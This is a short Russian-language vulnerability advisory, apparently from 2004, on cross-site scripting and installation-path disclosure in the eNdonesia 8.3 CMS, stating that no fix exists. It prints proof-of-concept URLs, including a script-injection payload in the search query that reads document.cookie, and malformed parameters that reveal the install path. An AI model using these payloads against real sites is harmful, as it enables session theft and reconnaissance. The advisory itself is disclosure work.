Security Lab

Межсайтовый скриптинг в eNdonesia

Дата публикации:08.08.2004
Всего просмотров:970
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: eNdonesia 8.x
Уязвимые версии: eNdonesia 8.3

Описание: Несколько уязвимостей в eNdonesia позволяет удаленному пользователю выполнить XSS нападение и определить инсталляционный путь.

1. XSS:

http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3Ealert(document .cookie)%3C/script%3E
2. Раскрытие пути:
http://localhost/endon/mod.php?mod=1

http://localhost/endon/mod.php?mod=pu blisher&op=viewcat&cid=%3Cb%3Etest%3C/b%3

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your character]

URL производителя: http://sourceforge.net/projects/endonesia

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in eNdonesia CMS